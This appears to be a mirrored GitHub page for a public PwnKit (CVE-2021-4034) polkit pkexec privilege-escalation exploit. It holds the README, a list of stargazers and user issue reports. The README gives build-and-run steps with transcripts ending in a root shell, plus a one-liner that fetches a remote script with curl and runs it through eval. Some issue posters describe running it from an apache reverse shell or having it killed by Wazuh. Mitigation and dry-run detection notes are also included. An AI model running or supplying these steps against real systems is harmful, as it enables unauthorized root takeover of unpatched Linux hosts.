berdav / cve-2021-4034 Goto Github PK

View Code? Open in Web Editor NEW

1.9K 21.0 511.0 28 KB

CVE-2021-4034 1day

License: MIT License

Makefile 19.55% C 74.73% Shell 5.71%

cve-2021-4034's Introduction

CVE-2021-4034

One day for the polkit privilege escalation exploit

Just execute make, ./cve-2021-4034 and enjoy your root shell.

The original advisory by the real authors is here

PoC

If the exploit is working you'll get a root shell immediately:

vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

Updating polkit on most systems will patch the exploit, therefore you'll get the usage and the program will exit:

vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$

Dry Run

To not execute a shell but just test if the system is vulnerable compile the dry-run target.

If the program exit printing "root" it means that your system is vulnerable to the exploit.

vagrant@ubuntu-impish:~/CVE-2021-4034$ make dry-run
...
vagrant@ubuntu-impish:~/CVE-2021-4034$ dry-run/dry-run-cve-2021-4034
root
vagrant@ubuntu-impish:~/CVE-2021-4034$ echo $?
1

If your system is not vulnerable it prints an error and exit.

vagrant@ubuntu-impish:~/CVE-2021-4034$ dry-run/dry-run-cve-2021-4034
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$ echo $?
0

About Polkit pkexec for Linux

Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).

One-liner commands

You can easily exploit the system using a single script, downloadable and executable with this command:

eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"

vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami
vagrant
vagrant@ubuntu-impish:~/CVE-2021-4034$ eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
# whoami
root

Mitigation

If no patches are available for your operating system, you can remove the SUID-bit from pkexec as a temporary mitigation.

# chmod 0755 /usr/bin/pkexec

The exploit then will fail complaining that pkexec must have the setuid bit enabled.

vagrant@ubuntu-impish:/vagrant/CVE-2021-4034$ sudo chmod 0755 /usr/bin/pkexec
vagrant@ubuntu-impish:/vagrant/CVE-2021-4034$ ./cve-2021-4034
GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT”
pkexec must be setuid root

cve-2021-4034's People

Contributors

Stargazers

Watchers

Forkers

mosesrenegade crackercat getcode2git dk47os3r thanhuutuan nhpt bb33bb bravery9 zzy1d faru0 d2550 qimiaoliaoss mhurts bgrstar sairson brianwrf veeeooo byte4sec yougar0 sp4rta buglogging ch3nye at0the g-gini zgzhang seeflowerx zcbiggold p65c yukar1z0e ph4ntonn ir1skry wangj447 raspberryhusky ak4l3r3 phuong39 istoliving songzhishuo shellb0y 1amfine2333 silocityit jxpsx binganao sv3nbeast triomphel fb-sec woodu xdreamseeker burpheart conanjun sarleon whitelee03 heyzm dontforgetui jas502n kobe718 dean2021 pghook phw110 zzhsec jeromeyoung atpiu badmonkey7 jimoyong 1oa exp1orer alilash-github sosonp criticalpulsar meowwbox want2live233 exp10r3r picaqqq yanshu911 chenpengxiao narutogit empty2081 ridter lovepou lilc1 greatyy reike wyzmgmdg rootsecurity listenquiet badb100d sengxian meerzulee mazahaka-jay talitharaha afwu unothing jarvis-starkz jackpot777 m1anbao nixiteam developer191 git-ligy tukali polarpeak miagz

cve-2021-4034's Issues

exploit gets killed

exploit gets killed the moment it executes execve
I tried printing after execve line but it doesn't execute after that line, exit code is 137

I am an apache user and have reverse shell
polkit version: 0.112-26.el7_9.1
Linux 3.10.0-1160.59.1.el7.x86_64
CentOs 7

HMM...... Wazuh was killing it..

/bin/sh: 0: Illegal option -p

Running the script, I receive /bin/sh: 0: Illegal option -p on raspbian stretch

Problem with conversion

When running the program, it throws this error: GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT”

Cannot convert message？

GLib: Cannot convert message: Could not open converter from "UTF-8" to "PWNKIT"

how to use username instead of uid ?

Hello, thank you for the great idea and the beautiful code you wrote.
I wonder if there is a way we can switch to another user instead of root?I mean, is there any way to change this line setuid(0); to something like setuser(root); ?
or better to ask, how to give the user's name instead of the user's uid?

I know my question may seem ridiculous, but I would be grateful if you could help me.

Thank you

Not working on raspbian

Any help?

🙂

Is this error build or not compatible ?

Root

/bin/true or /usr/bin/true

some systems still use /bin/true, might fit into readme

The value for the SHELL variable was not found the /etc/shells file

GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT”
The value for the SHELL variable was not found the /etc/shells file

This incident has been reported.

1 RFE: Testing instead of actual rooting

What I need is to deploy a safe C binary to detect this CVE . Return 1 code if not already patched without actually rooting the system, return 0 if the system is patched.
Can this RFE be added ?

cannot stat '/usr/bin/true': No such file or directory

Doesn't do anything

~/CVE-2021-4034 $ ./cve-2021-4034
~/CVE-2021-4034 $ echo $?
127
~/CVE-2021-4034 $ echo $UID
1000

It neither escalates privileges nor it prints pkexec usage. It just exits with 127 exit code.

Linux xxxxxx 5.10.0-11-amd64 #1 SMP Debian 5.10.92-1 (2022-01-18) x86_64 GNU/Linux
policykit-1-doc/stable-security,stable-security 0.105-31+deb11u1 all
policykit-1-gnome/stable,now 0.105-7 amd64
policykit-1-gnome/stable 0.105-7 i386
policykit-1/stable-security,now 0.105-31+deb11u1 amd64
policykit-1/stable-security 0.105-31+deb11u1 i386

doesn't do anything

~/CVE-2021-4034 $ ./cve-2021-4034
~/CVE-2021-4034 $ echo $?
127

I think it's an error related to environmental variables, how can I solve it?
If it is not an environmental variable problem, I would appreciate it if you could tell me the cause and solution.